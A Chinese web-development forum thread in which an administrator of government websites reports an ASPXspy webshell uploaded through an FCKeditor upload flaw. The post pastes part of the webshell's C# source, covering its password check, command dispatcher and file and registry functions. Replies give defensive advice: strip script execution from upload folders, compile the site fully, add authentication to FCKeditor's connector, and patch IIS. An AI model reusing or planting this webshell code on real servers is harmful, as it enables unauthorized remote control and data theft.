网站被挂马了，ASPXspy（附带源码）如何处理

本人管理的都是政府网站，现在有个省级网站被挂ASPXspy，市公安局要求出解决方案，我服务器怎么设置可以屏蔽ASPXspy运行，使用的是FCKeditor，被上传木马文件，现在已经换成kindeditor
一下是代码：<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/*
Thanks Snailsor,FuYu,BloodSword,Cnqing,
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : [email protected]
*/
public string Password = "12e83b7076695d26a869500e1de9f257";//admin
public string vbhLn="ASPXSpy";
public int TdgGU=1;
protected OleDbConnection Dtdr=new OleDbConnection();
protected OleDbCommand Kkvb=new OleDbCommand();
public NetworkStream NS=null;
public NetworkStream NS1=null;
TcpClient tcp=new TcpClient();
TcpClient zvxm=new TcpClient();
ArrayList IVc=new ArrayList();
protected void Page_load(object sender,EventArgs e)
{
YFcNP(this);
fhAEn();
if (!pdo())
{
return;
}
if(IsPostBack)
{
string tkI=Request["__EVENTTARGET"];
string VqV=Request["__File"];
if(tkI!="")
{
switch(tkI)
{
case "Bin_Parent":
krIR(Ebgw(VqV));
break;
case "Bin_Listdir":
krIR(Ebgw(VqV));
break;
case "kRXgt":
kRXgt(Ebgw(VqV));
break;
case "Bin_Createfile":
gLKc(VqV);
break;
case "Bin_Editfile":
gLKc(VqV);
break;
case "Bin_Createdir":
stNPw(VqV);
break;
case "cYAl":
cYAl(VqV);
break;
case "ksGR":
ksGR(Ebgw(VqV));
break;
case "SJv":
SJv(VqV);
break;
case "Bin_Regread":
tpRQ(Ebgw(VqV));
break;
case "hae":
hae();
break;
case "urJG":
urJG(VqV);
break;
}
if(tkI.StartsWith("dAJTD"))
{
dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
}
else if(tkI.StartsWith("Tlvz"))
{
Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
}
else if(tkI.StartsWith("Bin_CFile"))
{
YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
}
}
}
else
{
PBZw();
}
}
public bool pdo()
{
if(Request.Cookies[vbhLn]==null)
{
tZSx();
return false;
}
else
{
if (Request.Cookies[vbhLn].Value != Password)
{
tZSx();
return false;
}
else
{
return true;
}
}
}
public void tZSx()
{
ljtzC.Visible=true;
ZVS.Visible=false;
}
protected void YKpI(object sender,EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(vbhLn,null));
tZSx();
}
public void PBZw()
{
ZVS.Visible=true;
ljtzC.Visible=false;
Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";字数最大了..ASPXspy 服务器安全木马后门ASPXspy 服务器安全 ASPXspy服务器

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

最直接的办法，在硬件防火墙有个策略禁之。
或者写个服务或windows计划程序 kill之，这样有点费资源。
上传目录和临时目录去除可执行权限。也可以自己写个程序杀马啊!写个web 杀马程序技术含量挺低的。
你还是用IIS6吗？IIS6有jpg漏洞，禁用掉.asp的执行权限。
哪有asp？这明明是上传了一个aspx然后远程调用它。
如果你的asp.net网站是完整编译的，也就是说所有aspx、ascx、asax等文件都编译完了只有一行提示（根本不应该允许有设计代码），那么或者，系统本身就不再允许还有设计页面的aspx执行（我有5年不用asp.net做东西了，不知道现在asp.net是否还是允许“完整编译、仅编译后台代码、完全不编译”同时执行）。基本上，你稍微修改自己的所谓FckEditor来识别上传的代码的特征，就够了。
某个人通过网站文章编辑功能而注入aspx，几乎没有什么硬件防火墙是用来防这类“内容”和网站业务逻辑错误的。
你怎么知道没有asp?很多上传aspxSpy都是利用IIS的jpg漏洞的。我们以前的一个服务器就是因为同时支持asp和asp.net被攻击了。
CK的上传漏洞貌似。。一直存在。所以我现在已经不用这个了。
如果用的是源码模式放在iis上。。我只能说。呵呵
全编译！！
一个是删除木马文件,二是看看上传的控件或文件是否都加了权限判断,FCKeditor也可以加权限判断的filemanager\connectors\aspx\config.ascx
private bool CheckAuthentication()
{
// WARNING : DO NOT simply return "true". By doing so, you are allowing
// "anyone" to upload and list the files in your server. You must implement
// some kind of session validation here. Even something very simple as...
//
// return ( Session[ "IsAuthorized" ] != null && (bool)Session[ "IsAuthorized" ] == true );
//
// ... where Session[ "IsAuthorized" ] is set to "true" as soon as the
// user logs in your system.
        if (Session["Admin"] == null || Session["Admin"].ToString() == "")
    return false;        return true;
}
有asp的网站，以前的网站都是asp的大概有30个网站，08年之后的网站才用的asp.net做的
IIS6及以下版本是有jpg漏洞的，好像有补丁，你找找看，打个补丁吧。
推荐你用macfee的服务器杀毒软件，里面带各种定制规则，你可以去网上找个严厉的规则，保证不会被上传（即使是被上传，也会马上被kill掉）
搞半天是这种问题啊。我先描述一下LZ的问题，不知道我是否理解正确哦。LZ做了个网站，网站中允许用户上传文件，然后有人上传了ASPX文件，通过远程访问，执行了该ASPX文件，而由于该ASPX文件有恶意成分，因此，如何解决，是这样的吧？
至于杀毒、筛选，我就不说了，都是治标不治本的方法，首先人家压根不是病毒或木马，杀毒或防火墙也就无能为力。其次，筛选的话，要从自己的程序端入手，容易出错，且好不容易堵住了这种筛选，结果人家又从别的地方来捣乱，因此LZ想的从服务器端入手是最可行的办法。IIS是可以按目录设置ASPX的执行权限的。我就不截屏了。简单说一下，IIS7.0下，选择不想执行ASPX的文件夹，比如UPLOAD，然后选择右面的“处理程序映射”，把ASPX、ASMX、ASCX、ASHX等等文件的映射全部去掉，OK，该文件夹就不能执行上述文件了。
macfee的杀毒软件防火墙是可以自定义规则的，你可以定一个如果指定目录里面新建了扩展名是.aspx的就删除的规则，这样在没有找到程序漏洞的时候，这个办法很管用。
给上传的文件夹IIS里设置执行权限为无。
不可以。因为上传目录中的文件，是要被引用的。比如一张jpg，可以通过http的url来引用。而如果放在网站目录之外，则无法引用了。